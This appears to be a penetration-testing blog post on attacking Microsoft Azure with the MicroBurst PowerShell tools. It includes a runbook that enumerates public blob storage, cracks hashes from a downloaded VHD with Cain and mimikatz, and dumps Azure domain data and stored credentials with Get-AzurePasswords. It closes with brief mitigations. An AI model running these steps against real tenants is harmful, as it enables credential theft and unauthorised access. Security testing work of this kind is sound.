As companies deploy and use Microsoft’s Azure cloud services more, the cloud platform becomes more of a target for threat actors. By default, all domain user credentials have access at Azure Portal, which contains information that is useful during a pen test. The ways this information can be accessed is through the web interface, a REST API, or PowerShell cmdlets. PowerShell cmdlets use integrated auth, return pipeline-able objects, produce malleable output, and handles large data sets at scale, so it is preferred.
The microburst tool relies on Azure Service Management (ASM), Azure Resource Management (AzureRM), and MSOnline (useful if the others are locked down). Other existing tools to note are Azucar and Azurite. A good resource for further reading beyond what is discussed here, can be found at Pentesting Azure Applications. The book discusses why to perform this testing, outlines the testing process, and provides some example scripts.
The microburst toolset has multiple functions:
Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains
Get-AzurePasswords
Get-AzureDomainInfo
Get-MSOLDomainInfo
#load the module
Import-Module C:\MicroBurst\MicroBurst.psm1 -Verbose
Azure User Information
Azure Active Directory (AD) contains users, groups, phone numbers, enrolled devices, and third party applications that rely on Active Directory Federated Services (ADFS). DCSync is usually performed from a company’s main domain to the Azure AD, and, depending on the permissions, one may be able to create a guest user for persistence (a noisy indicator of compromise). All of this information can lead to additional attacks, such as password guessing, phishing, and accessing third party web applications through Single Sign-On (SSO) functionality.
Azure File Storage
On the storage side of things with Azure, we’ve got a naming structure of $STORAGE_ACCOUNT.blob.core.windows.net. Config files, virtual hard disks (VHD), and sensitive information may be found within the container (folder). The data types involve blobs, which are similar to S3 buckets, file services, data tables, and queues. Since files can be stored within this service, hosting payloads within the blob, which is a trusted URL, heightens the chance of payload delivery. This anonymous blob enumeration is possible due to an access policy for the blob container being set to a public access level. If you’re an anonymous user who knows the storage account and the name of the container, then files within can be enumerated.
Azure SQL
Azure SQL is commonly used when an application requires a database in the cloud. Misconfigurations occur when the SQL services are configured to face the internet. Common vulnerabilities involving SQL are present, which may involve weak passwords or exploitable services. Within the Azure Portal, if credentials are obtained and database access rights are present, information can be queried from the Query Explorer in Azure SQL. SQL Management Studio can also be used, even though it’s locked down by default, firewall misconfigurations occur. It is possible to use Azure SQL as a C2 channel, which is described in the post titled Databases and Clouds: SQL Server as a C2. The benefits of coming from a trusted domain that can be used as a pivot point are notable.
Azure Credential Storage
Azure credential material comes in the form of Key Vaults, which contain keys, certs, and passwords. Key vaults are accessible by having owner rights on an Azure subscription. Application Services Configurations, which contain deployment credentials and database connection strings, are used to scale applications. Scaling is done by pointing this service at the application’s code base and deploying servers to meet the additional demand when needed. Automation Accounts, which are credentials used to perform automation within Azure, can be discovered by creating, importing, and running an automation script. The results of the script are then retrieved before deleting the automation script. A tool to enumerate this information with an a compromised credential is called Get-AzurePasswords.
Sample Escalation Demo Scenario
- Anonymously enumerate a public blob storage container with
Invoke-EnumerateAzureBlobs - List Files
- Download VHD
- Parse credentials from VHD file
- Crack hashes for local and cached creds
- Login to VM via RDP
- Login to Azure with the cracked domain credentials
- Connect as domain user and dump domain info with
Get-AzureDomainInfo - List out user information, groups, and services
- Dump remaining domain passwords for Azure subscription with
Get-AzurePasswords - Get VPN access
- Pivot to internal domain / network
Sample Escalation Demo Runbook
#import the module
Import-Module C:\tools\MicroBurst\MicroBurst.psm1
#finds the microburst.blog.core.windows.net storage account
#also finds the container of microburst.blog.core.windows.net/test
#the contents get listed and the test.vhd file is downloaded for forensic analysis with a browser
Invoke-EnumerateAzureBlobs -Base microburst
The cain tool is then used to reference the SAM and SYSTEM file to extract the local hashes for the Administrator account from the VHD. The local Administrator username and hash can be cracked and the system can then be logged into. The kon-boot tool or modifying the SAM file is also effective in obtaining system access. The mimikatz tool is then ran on the system to extract additional credential material once logged in with the Administrator account. The secretsdump.py tool from Impacket can also be used to extract domain cached credentials for cracking, which resulted in additional Microsoft Azure access to run the commands below.
#connect to Azure through a login prompt
Connect-AzureRmAccount
#retrieves information related to subscriptions, domain users, groups, storage accounts, etc.
Dump-AzureDomainInfo -folder $FOLDER_NAME -Verbose
#check account logged in
Get-AzureAccount
#retrieve available credential material
Get-AzurePasswords -Verbose | Out-GridView
To prevent this behavior, do not allow Azure Management access for non-admin users, routinely review Azure for misconfigurations, blacklist weak passwords in Azure, and set up multi-factor authentication for all users with Azure access.